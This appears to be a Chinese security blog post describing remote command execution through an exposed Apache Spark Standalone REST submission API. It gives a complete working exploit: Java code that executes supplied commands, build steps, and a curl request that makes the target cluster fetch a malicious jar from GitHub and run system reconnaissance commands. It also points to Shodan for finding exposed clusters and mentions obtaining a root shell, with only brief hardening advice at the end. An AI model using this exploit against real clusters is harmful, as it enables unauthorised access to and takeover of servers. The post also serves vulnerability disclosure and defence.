黑掉大数据之Spark

aRe00t, https://weibo.com/xyzfan, 数据分析师, 新浪安全.

目前在大数据的生态圈中, Spark 以其优异的性能和丰富的功能, 已成为最流行的大数据分布式处理框架之一. 虽然 Spark 在安全方面做了不少工作, 可是由于配置不当, 仍会导致一些安全问题. 本文发现了一种通过 Spark 远程执行命令的方法, 该方法的利用难度很低, 可使攻击者很容易拿到服务器权限.

引言

Spark 是一种分布式计算框架, 通常部署在多台机器上, 但也可单机部署. 集群内的进程主要分为两种角色: master 和 slave. 下图中的 Cluster Manager 即为 master, 每个 Worker Node 是一个 slave.

黑掉大数据之Spark_第1张图片

搭建 Spark 集群最简单的模式为: Spark Standalone, 本文也只在该模式下进行了实验.

使用默认配置运行集群后, Web UI 会运行在 master 的 8080 端口上. 下图是在 Shodan 上找到的一个 Spark 集群, 请留意红框中的 REST URL, 我们后面后用到.

黑掉大数据之Spark_第2张图片

该集群有 4 个 woker 进程, 分别跑在 4 台机器上. 每个 worker 分配了 2 个 CPU 和 1 GB 内存, 是一个规模较小的集群.

黑掉大数据之Spark_第3张图片

默认配置下, 我们可从任意机器提交代码到集群, 提交后的代码有两种部署方式, 区别如下.

部署方式 运行机制
client Driver 运行在提交代码的机器上
cluster Driver 运行在集群内的某个 worker 上

这里可将 driver 简单的理解为我们提交的代码, 具体含义和相关内容请见:
https://spark.apache.org/docs/latest/submitting-applications.html
https://spark.apache.org/docs/latest/cluster-overview.html

方法

前提条件

  1. Standalone 模式部署的 Spark 集群.
  2. Master 的 REST URL 可访问.

步骤

  1. 将恶意 jar 包发布到 master 可访问的地方, 例如 HTTP 服务器.
  2. 向 REST URL 提交用 cluster 模式运行该 jar 包的请求.
  3. 通过 Web UI 观察命令执行结果.

代码

Jar 包中只有一个代码文件, 用于执行通过参数传入的命令.

import java.io.BufferedReader;
import java.io.InputStreamReader;

public class Exploit {
  public static void main(String[] args) throws Exception {
    String[] cmds = args[0].split(",");

    for (String cmd : cmds) {
      System.out.println(cmd);
      System.out.println(executeCommand(cmd.trim()));
      System.out.println("==============================================");
    }
  }

  // https://www.mkyong.com/java/how-to-execute-shell-command-from-java/
  private static String executeCommand(String command) {
    StringBuilder output = new StringBuilder();

    try {
      Process p = Runtime.getRuntime().exec(command);
      p.waitFor();
      BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));

      String line;
      while ((line = reader.readLine()) != null) {
        output.append(line).append("\n");
      }
    } catch (Exception e) {
      e.printStackTrace();
    }

    return output.toString();
  }
}

打包 (JDK 1.8)

javac Exploit.java
jar cf Exploit.jar Exploit.class

提交至 Spark 集群

curl -X POST http://1.1.1.1:6066/v1/submissions/create \
--header "Content-Type:application/json;charset=UTF-8" \
--data '{
  "action": "CreateSubmissionRequest",
  "clientSparkVersion": "2.2.0",
  "appArgs": [
    "whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
  ],
  "appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
  "environmentVariables": {
    "SPARK_ENV_LOADED": "1"
  },
  "mainClass": "Exploit",
  "sparkProperties": {
    "spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
    "spark.driver.supervise": "false",
    "spark.app.name": "Exploit",
    "spark.eventLog.enabled": "true",
    "spark.submit.deployMode": "cluster",
    "spark.master": "spark://1.1.1.1:6066"
  }
}'

代码已传至: https://github.com/aRe00t/rce-over-spark

结果

命令执行结果可在 Web UI 中找到

  1. 在页尾找到 Completed Drivers, 单击相应 worker 的链接.


  2. 在新页面页尾找到 Finished Drivers, 单击相应的 stdout.


  3. 在新页面中可看到命令执行结果.


    黑掉大数据之Spark_第4张图片

如果是用 root 运行的 Spark 集群, 则可直接拿到 root shell.

总结

本文只测试了 2.2.0 版本, 但远程提交机制很早就存在了, 该方法可能也适用于之前的版本.

Spark 的远程提交机制给开发者提供了部署代码的便利性, 但如果不加限制的将接口暴露给所有人, 则会增加集群的安全风险. 通过 Shodan 或 ZoomEye 可发现有不少这样的集群, 建议集理员设置相关的访问控制策略.

将来的工作

  1. 如果服务器有多个网卡, 6066 默认开在内网网卡上, 如何利用公网的 8080 和 7077 提交代码?
  2. Driver 会被随机分配到某个 worker 上, 如何将恶意代码放进 application, 从而一次提交就可在所有 worker 上执行?
  3. YARN, Mesos 的集群部署方式如何利用?
  4. Flink/Storm/Heron 等可远程提交代码的分布式计算框架, 是否有同样的问题?

你可能感兴趣的:(黑掉大数据之Spark)